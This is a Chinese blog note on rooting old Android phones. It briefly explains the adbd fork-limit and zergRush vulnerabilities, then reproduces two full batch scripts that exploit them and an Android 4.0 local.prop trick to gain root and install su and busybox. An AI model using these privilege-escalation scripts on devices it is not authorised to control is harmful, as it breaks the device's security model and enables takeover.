Android root 有感

1 Android下面想做事情，会有权限限制。所以经常需要提取Root权限。

2 Android下面获取Root权限的方法并不完全是一样的。这是由于Android的源码漏洞决定了的。提取Root权限就是利用Android系统的漏洞。所以不同的版本的漏洞是不一样的，才导致提取Root的方法是不一样的。

3 Android获取Root的最终步骤是：在System目录下的bin或xbin目录下，放一个有root权限的su文件。在xbin下面放入一个busybox文件；另外装上一个SuperUser.apk，用来管理权限的使用。

4 Android版本的漏洞有下面几个：

  1 adbd中有个漏洞是创建线程成功时，降底进程的权限。但是创建进程时没有判断进程有没有创建成功。利用Shell进程最大数的限制，不断的Fork（）新的僵尸进程。从而达到进程限制上限。这样就可以让adbd创建不成功，从而跳过降权限的语句。

  2 zergRush exploit :zergRush堆栈溢出.需要一个.zergRush的可执行文件.

  3

  4 Android4.0 提取ROOT.

  重新链接.

 

 

5 提取Root的指令如下:

 zerRush漏洞:

  @echo ---------------------------------------------------------------
@echo               Easy rooting toolkit (v1.0)
@echo                    created by DooMLoRD
@echo         using exploit zergRush (Revolutionary Team)
@echo    Credits go to all those involved in making this possible!
@echo ---------------------------------------------------------------
@echo  [*] This script will:
@echo      (1) root ur device using zergRush exploit
@echo      (2) install Busybox (1.18.4)
@echo      (3) install SU files (3.0.5)
@echo  [*] Before u begin:  
@echo      (1) make sure u have installed adb drivers for ur device
@echo      (2) enable "USB DEBUGGING"
@echo            from (Menu\Settings\Applications\Development)
@echo      (3) enable "UNKNOWN SOURCES"
@echo            from (Menu\Settings\Applications)
@echo      (4) [OPTIONAL] increase screen timeout to 10 minutes
@echo      (5) connect USB cable to PHONE and then connect to PC
@echo      (6) skip "PC Companion Software" prompt on device
@echo ---------------------------------------------------------------
@echo  CONFIRM ALL THE ABOVE THEN
@pause
@echo --- STARTING ----
@echo --- WAITING FOR DEVICE
@files\adb wait-for-device
@echo --- cleaning
@files\adb shell "cd /data/local/tmp/; rm *"
@echo --- pushing zergRush"
@files\adb push files\zergRush /data/local/tmp/.
@echo --- correcting permissions
@files\adb shell "chmod 777 /data/local/tmp/zergRush"
@echo --- executing zergRush
@files\adb shell "./data/local/tmp/zergRush"
@echo --- WAITING FOR DEVICE TO RECONNECT
@echo if it gets stuck over here for a long time then try:
@echo    disconnect usb cable and reconnect it
@echo    toggle "USB DEBUGGING" (first disable it then enable it)
@echo --- DEVICE FOUND
@files\adb wait-for-device
@echo --- pushing busybox
@files\adb push files\busybox /data/local/tmp/.
@echo --- correcting permissions
@files\adb shell "chmod 755 /data/local/tmp/busybox"
@echo --- remounting /system
@files\adb shell "/data/local/tmp/busybox mount -o remount,rw /system"
@echo --- copying busybox to /system/xbin/
@files\adb shell "dd if=/data/local/tmp/busybox of=/system/xbin/busybox"
@echo --- correcting ownership
@files\adb shell "chown root.shell /system/xbin/busybox"
@echo --- correcting permissions
@files\adb shell "chmod 04755 /system/xbin/busybox"
@echo --- installing busybox
@files\adb shell "/system/xbin/busybox --install -s /system/xbin"
@files\adb shell "rm -r /data/local/tmp/busybox"
@echo --- pushing SU binary
@files\adb push files\su /system/bin/su
@echo --- correcting ownership
@files\adb shell "chown root.shell /system/bin/su"
@echo --- correcting permissions
@files\adb shell "chmod 06755 /system/bin/su"
@echo --- correcting symlinks
@files\adb shell "rm /system/xbin/su"
@files\adb shell "ln -s /system/bin/su /system/xbin/su"
@echo --- pushing Superuser app
@files\adb push files\Superuser.apk /system/app/.
@echo --- cleaning
@files\adb shell "cd /data/local/tmp/; rm *"
@echo --- rebooting
@files\adb reboot
@echo ALL DONE!!!
@pause

 

Android4.0下:

echo off

cls
echo.
echo by zopo008 (欢迎访问bbs.zopomobile.com.)
echo.
echo.
adb shell mv /data/local/tmp /data/local/tmp.bak
adb shell ln -s /data /data/local/tmp
adb reboot
echo Rebooting (1/3) - Continue once device finishes rebooting
echo 正在重启手机（第1次，共3次）- 请等待重启完毕，之后按任意键继续
pause

adb shell rm /data/local.prop > nul
adb shell "echo \"ro.kernel.qemu=1\" > /data/local.prop"
adb reboot
echo Rebooting (2/3) - Continue once device finishes rebooting
echo 正在重启平板（第2次，共3次）- 请等待重启完毕，之后按任意键继续
pause

adb shell id
echo If the id is 0 / root then continue, otherwise ctrl+c to cancel and start over
echo 如果上面显示的id为0或者root，按任意键继续；否则按Ctrl-C并回复Y来取消本次root尝试，然后重试
pause

adb remount
adb push su /system/bin/su
adb shell chown 0.0 /system/bin/su
adb shell chmod 06755 /system/bin/su
adb push busybox /system/bin/busybox
adb shell chown 0.0 /system/bin/busybox
adb shell chmod 0755 /system/bin/busybox
adb push Superuser.apk /system/app/Superuser.apk
adb shell chown 0.0 /system/app/Superuser.apk
adb shell chmod 0644 /system/app/Superuser.apk
adb push RootExplorer.apk /system/app/RootExplorer.apk
adb shell chown 0.0 /system/app/RootExplorer.apk
adb shell chmod 0644 /system/app/RootExplorer.apk
echo Removing changes except ROOT
echo 正在进行清理和恢复
adb shell rm /data/local.prop
adb shell rm /data/local/tmp
adb shell mv /data/local/tmp.bak /data/local/tmp
adb reboot

echo Rebooting (3/3) - You should now be Rooted
echo 正在重启平板（第3次，共3次） - root成功
pause

echo on